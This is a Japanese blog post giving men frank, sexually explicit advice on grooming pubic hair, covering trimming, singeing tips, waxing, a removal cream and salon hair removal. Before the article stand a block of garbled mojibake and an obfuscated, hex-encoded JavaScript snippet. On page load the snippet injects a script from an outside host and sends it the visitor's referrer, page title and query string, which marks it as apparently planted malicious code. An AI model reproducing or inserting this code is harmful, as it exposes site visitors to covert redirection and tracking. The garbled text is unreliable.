a???�?a?�e?�a��?��a??a??a??a??e�?a?�a��a??a??a?�a??a??a?�a??a�?a��a??a��a??a??a?�a??a��a�?a?�a??a?�a��aS??z?a?�a?�a??a?�a?�a��

a?�a?�a???�?a?�e?�a��?��a??a?�a?�aS??z?a??a?�a�Sa??a?�a��a�?a�Sa?�a??a��e��???a?�a?�?��a??a??a?�a��a?�a�?a??a?�a��a??a�?a��?��a?�a��a??a??a???�?cs�a?�?�?a??a?�a?�a��c�??��a??a�?a??a?�c�??��a��a??a?�a??a?�a?�a??a��a???�?cs�a?�?�?a??a?�a?�a??a?�a��

a?�a?�a???�?a?�e?�a��?��a��??�c�?a?�a�?c�??��a?�a???�?a��?S�a?�a?�a??a?�a��a?�a��a?�a??e?Za?Za��c?�a?�a??a?�a�?a?�a�?a???�?a??a�?a?�a�Sa��a?�a?�a??a��a?�a?�c�?a?�a?�a?�a??a?�?��a?�a??a?�a��a��c�???�cs�a?�e��a?�a?�a?�a?Ya�Sa�?a?�?��a??a?�?�?a??a?�a?�a??a��e��a?�a??a?�a?�a?�a?�a??a��a??a???�?cs�a?�?�?a??a?�a?�a��a?�a??a��c�?a?�a?�a?�a??a??a?�a��a?�a��

e�?a��e��c�?a��??�c�?a?�a�?e�?a?�a??a???�?a��???a??a?�a?�a��a?�a??a��c�?a?�

a?Se??a?�a???�?a?�e?�a��?��a��??�a?�a?�a?Ya�?a?�?�???�a?�e�?a��e��c�?a??a?�a�Sa??a?�a��

e�?a��e��c�?a??a??e�?a?�a?�a?�a??a��e��c�?a?�a�?c�??��a?�e�?a?�a?�a?�a??a��cY?a??a?�a��a��a?�a?�a??a?�a?�a��

e�?a��e��c�?a��a?�a��a??a�?c�??��a?�a???��a?�e�?a?�a??a???�?a��???a??a?�a?�a��a??a?�a?�a?�a??a��c�?a?�a?�a??a??a�????a??a?�a��a?�?��a?�a??a?�a?�a??a�?a??a??e�?a?�a??a???�?cs�a?�?�?a?�a??a��a??a��e?�a?�a?Ya??a?�a?�a?�e�?a?�a?�a?�a??a��e��a??a?�a??a?�a??a?�a?�a��a?�a?�a��

a??a?�a?Ya�?a�?e�?a��e��c�?a��a?�a��a?�a??a?�c�??��a?�a???��a??i??a?�a?�a??a??c�?a?�a???�?a��???a??a?�a??a�?a?�a?�a��a?�a?�a��i?Zi?Zi?Zi?�a???�?a?�a�?a?�a?�a??a�Sa??a?�a��

a?Ya?�a?�e�?a��e��c�?a??1a�?2a�za?�a?Ya??a��a?�a?�a??a?�a??a�SaS??z?a??a?�a�Sa??a?�a��a��1a�?2a�za??a��a?�a?�a??i??a?Ya?�a?�a?Sa?�a�?a??a�Sa??a??a??a??a??a?�a?�a??i?Yi?�a??a��a?�a?�a?�a?�?�?a�?a�?a?sa�?a???�?a��???a??a?�a?�a��a???�?a�?a?�a��a??a?�a�?a??a?�e�?a�Sa??a?�a��a��

a?�a�?a��a??c?�?Z?e��a??a???�?a�?a�z?��a��e�?a?�a��a?�a??a??e�?e�?a??a??a�Sa??a?�a��a�z?��a��e�?a?�a��a?�a??a?�?�?c��a?�i??a?�a?�a??es?a?�c�?a?�e�?a?�a?�a?�a??a��e��a?�a?�a??a�?a��a��a?�a??a��a��a?�a?�a?�a?�a???�?cs�a?�?�?a??a?�a??a�?a?�a��i?Yi?�a???�?a�?a?�a��a?�a??a??a�????a��a�?a?�a?�a??a�Sa??a?�a��

1a�?2a�za?�c��a�?a?�a?sa�?a�z?��a��e�?a?�a��a?�a??a��a??a??a?�a??a?�a��a?�a��

a?Sa�S?��aS??z?a��??�c�?a?�a�???�?��?�Y??�a��???a?Ya?�a��


a?Sa�S?��aS??z?a��a???��a??e�?e�?a��c?�a�?a��a?Sa?�??�aS?a?�a?�a��a?�a?�aS??z?a??a�?a�S??�?��a?�e?�a?�?�Y??�a��c�??��a?�a???��a?�???a?Ya?�a��a?�a??a??a�????a��a?Ya�?a�?a?�?��a?�e�?e�?a��c?�a�?a��a?�a??a��a??e??a?�a?�a��

a?Sa�S?��aS??z?a??a??a??a��a��????��a��?�Ya??a?�a?�a��?��a?�a�?a?sa??a?Yc��?��a?�a??a?�a�???�?��?�Y??�a��???a??a��a?�a??a??a��aS??z?a?�a?�a??a?�a?�a��

a?�a�?a��??�c�?a?�a��a?�a??a?�c�??��a?�a???��a?�??�?��?�Y??�a��???a?Ya?�a��a�?a��c??cZ�a??e�?a??a��a?Ya�?a�?a?�?��a?�e�?e�?a��c?�a�?a��a�?a��a??e???��a??e�?a??a�Sa??a?�a��

a?Sa�S?��aS??z?a��a�Ye��a?�a��a?�a??a?�a�?a??a??a��a?�a?�a??e?Sa?�a?�a?�a?�c��a?�e??a??a�?a?Sa?�a?�a��?��a��a�?a��a??a??a�?a??a�?a�?a??a?�a?�a��a??a?�a??a?Ya��a?�a??a?�a�Sa??a?�a��e?Sa?�a?�a?�a?�c��a?�e??a??a??a?�a�?a??a?�a??a?�e�?a??a?�a?�a??a?�a??a?�a?�?�?a?�a?�a�?a?�a�?a?�a??a?�a��e�sa?�a?�a??a??a��e??a??a��a?�a�?a??a?�a?�a?�a?�a??a?�a?�a�?a��e��a��a??a��a?�?�???�a��a?�a�Sa??a?�a��

a?Ya??a??a?�a?�a??a?�a?�a�?a?�a��a??a��a��????��a��?�Ya??a��a??a?�a?�c�?a??a??a??a?�a?�a��a?Ya�?a�?a???�?a?�aS??z?a????Ya?�a�????a??a?�a��

a??a??a�?

a??c?�a��a?�a��e��a��a??a�?a???��a??a�?a??a??a?�a?Sa?�a?Se??a?�7a?�a?�a�?a??a??a?�e�?a??a??a�Sa??a?�a��

a?�a?sa�?a��c�??��a?�a???��a?�a???�?a��??�?��?�Y??�a��?S�a?�a?�a��aS??z?a??a?�a�Sa??a?�a��

a??c?�a��a??a�?a??a??a??a?�a?Ya��a�?a?�a?�a��a?Ya�?aS??z?a?�a???��?��a??e�?a?�a?�a?�a?�a�?a�sa??a?�a???��a?�e�sc�?a?�a??a?�a��

a??c?�a��a��c?�e�?a?�a?Ya?Sa?�a?Se??a?�a�?a??a��e?�a?�a?�a?�a�??��a�?a?�a???��a??a�?a??a??a?�?�?a��a��?��a?�a�?a�?a??a?�a��a?�i??
var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

【手入れは必須!】女に好かれるアンダーヘアを作るコツ

一般的にアンダーヘア…(下の毛ですね///)をお手入れするのは女性が主だったのですが、ここ10年は男性も、入念に手入れをするようになりました。

ヘアセットして、スタイルやアレンジを楽しむように、アンダーヘアのお手入れも、男性の中で日常化しつつあるのです!

え…まだやったことない……』、『どの辺をどんな風に手入れしたら良いかわからない』、『手入れしたらチクチクして肌荒れしちゃった』など、そういった皆さんのために、今回はそのアンダーヘアの手入れの仕方…それも女性に好感を持たれる処理の方法をお話したいと思います。

アンダーヘアのお手入れによるメリット


1.陰茎(サオ)が大きく見える!

2.清潔感がある。

3.衛生的である。

4.陰茎に毛が絡んで引っ張られることが無くなる。

5.蒸れて気持ち悪くならない。

6.汗による匂いが少なくなる。

などメリットが多く見られ、何より女性に見られる場面においても、伸ばしっぱなしの状態よりも遥かに好感触です。

お手入れの際の注意

男性の場合、剃毛、脱毛などただ闇雲にお手入れすれば良いわけではなく、そこには自然な男性らしさも残しておかなければならないのです。

また、使用する器具や薬剤にも注意が必要で、間違ったものを使用してしまうと、あなただけではなく、相手の女性にまで被害が及ぶのです。

お手入れのやり過ぎ、行き過ぎ



男性の場合、女性のように陰毛でキッチリ形を作って、その周りを完全剃毛ないし脱毛してしまうと、それを見た女性に逆に引かれてしまう傾向があります。

あくまで自然なスタイルを脱しない程度にお手入れする事が大事なわけで、やり過ぎは良くありません。

女性にとって、自分より、または気持ち悪い位綺麗な男性の陰毛のお手入れは、逆に好感を持てず、テンションが落ちます。

やり過ぎは逆に女性が萎えてしまうんです…はい。

カミソリ、T字を使った剃毛

これらを使うと、例え深剃りであろうとヒゲと同じで、剃った直後は良いのですが、問題なのは生えてきた時。

経験がある方もいらっしゃるかと思うのですが、チクチクしてこれがまたかゆい!!(笑)

基本的に刃物で切った毛の切り口は鋭利なものになるから、その毛先が肌やサオに擦れた時の痒さたるや……思わずちんちんカイカイしたくなりますね(苦笑)

更に女性とのSEXの際、フェラしてもらう時、挿入した時に接した部分が、相手の女性に半端ない痒さと不快感、時には痛みさえ与えてしまいます!

なので剃毛する際は、完全に剃り残しなしの深剃りする事を前提に、終わったあとは、化粧水や乳液などで乾燥を防ぐため、ちゃんと保水することをおすすめします。

脱色剤を使わない



そのまま剃らずのお手入れ、色くらい抜くか?ってな軽い気持ちで脱色を試みたり…あると思います(笑)

脱色剤は刺激も強く、あの刺激的な鼻を突く匂いも数日残る上、亀頭(カリ)部分のように粘膜が薄い部分に、炎症を起こしかねない陰部に使うのはおすすめできません。

上の毛は黒々としてるのに下は金髪……笑えませんが、上下で金髪で合わせる……眉毛は?腕の毛は?もぉ言い始めたらキリがありません(笑)ので、あまりアンバランスなスタイルはおすすめ出来ませんね(汗)

正しいお手入れ方法

男性には、陰毛の自然な形の逆三角形『Vライン』、アナル付近の『Oライン』があり、それぞれの部位の毛を手入れにより綺麗に、場合によってはサッパリして行きます(笑)

ただし、部位により使用するツールに相性もありますので、それらも含めてご紹介しますね。

まずは脱毛スタイルについて



※図は女性用ベースなので、一番底辺が陰茎(サオ)だと思ってください。

男性が目指す理想の形はナチュラル(へそ下から繋がる毛、太ももの辺りを剃毛、脱毛する以外は触れない)、よくやってトライアングル辺りで済ませるのが無難、その他にチャレンジしてしまうと、後々後悔してしまうかも知れませんので、そこは自己責任で(笑)

へそ下の毛(昭和で言うギャランドゥ!死語です(爆))は、お相手の女性が望まない限り、またはあなたにポリシーがない限りは、無い方が良いかも。

ヒートカッターを使う

剃毛するアイテムではなく、毛を途中でカットするもので、刃先が熱線状態のカッターで、熱で焼き切る技法をとることで、切り口を丸くすることができ、肌に触れてもチクチクしません。

家電量販店、通販で¥2,000~¥5,000ほどで購入出来るので、お手入れを日常化したい方にはおすすめです。

自然な形、毛並を残すため、生え際から2~3cmを目処にカットしますが、刃先がめっちゃ熱いので火傷に注意ですよ!?

ハサミでカット+線香、煙草で焼く



陰毛全体の毛を、生え際2~3cmより、気持ち長めにカットします。

また、それぞれの毛の長さをランダムにする為に、指で毛を1束摘んだら、ネジってもらい、そこをハサミで切ると、長さが均等にならず、自然に仕上がります。

ただハサミの場合切り口が鋭利になるので、少し面倒ですが、毛先を線香または煙草で焼くことで毛先を丸くし、肌に触れてもチクチクしないようにケアすることができます。

長く残しすぎたとしても、短く焼いてしまえばいいので、ある意味思い通りのスタイリングができますよね?

抜く!

不要な部分は全て抜く!もちろんこの方法ならば生え際がチクチクする事なんてありません!!

それに必要なものは毛抜きと根性だけ!(爆)

とはいえかなりの根気と痛みに耐える根性が必要で、1本1本終わるまで痛みが続くわけです……私にはとても我慢できそうにありません……。

ブラジリアンワックス



現在トップクラスの人気を誇るブラジリアンワックスなのですが、これは加熱して溶かす必要のない、誰でも簡単に使用できるスグレモノで、脱毛したい部分に粘度のあるワックスを塗り、上から専用のワックスペーパーを貼り、しばらく放置します。

時間を置いたら……もうおわかりですね?そう!一気に『べリッ!!!』……っとひと思いに剥いでやります。

毛抜きより痛みは一瞬、しかし個人差はありますが、なっかなか痛いのですが、剃るわけではないので、伸びてくるまでのスパンが長いのは少し魅力的なのかも知れませんし、生えてきた時も、剃ったあとのそれほどチクチクする訳ではありません。

『ブラジリアンワックス公式』

除毛クリームを使う

現在剃毛の際おすすめなのは、『NULLリムーバークリーム』で、刺激も少なく、剛毛でも大丈夫なんです。

皮脂や汚れを落とし、乾いた除毛したい部分に毛を覆うように集めにクリームを塗り、5~10分放置したあと、タオルなどで拭き取り、水で流すだけ。

これで綺麗サッパリ!毛の必要のない部分には手軽で素早く処理できますし、変な匂いも残りませんし低刺激なので、除毛を簡単に行うには良いアイテムだと思います。

『NULLリムーバークリーム公式』

メンズサロン、クリニックによる脱毛



使い分けが大切で、完全に毛がない状態で維持したい場所は、多少の時間とお金が掛かったとしても、脱毛する事をおすすめします。(除毛に対して日々の手間が苦にならなければ別ですが…)

特にOライン(アナル付近の毛)ですが、デリケートであり、皮膚も薄く、それでいて見えづらい部分なので、ここは完全に永久脱毛してしまうのが得策かと思います。

ここに毛はいるのか!?』…はい、わかります…(笑)

もしそれほどまで考えていないのであれば、抜くのは難しいので、カミソリやT字になるのですが、くれぐれも切らないようにお手入れして頂き、綺麗に剃毛出来たら乳液や保湿クリームでしっかりアフターケアしてください。

アナル付近が痒くなるの……嫌ですよね?(爆)

まとめ

男性は女性、女性は男性にと、それぞれが異性のためにどれほど努力しているのかがわかる内容なのですが、『まだそんな機会もチャンスないから…』とか言ってるとイキナリ来るんですよっ!?その機会やチャンスが!(笑)

いつなん時、何があってもいいように!…最初はもしかすると自己満足なのかもしれないけど…もちろんここだけちゃんとすれば言い訳じゃないですけどね?

日々自分のルックスに磨きを掛け、異性を意識しつつ、服装、スタイル、ヘアスタイル、トドメにココ?って感じで考えて頂けたらと思います。

どの部分でも同じことが言えると思うのですが、仕事も趣味もお洒落も、緩やかで構わないので日々継続が大事なんだと思いますよ?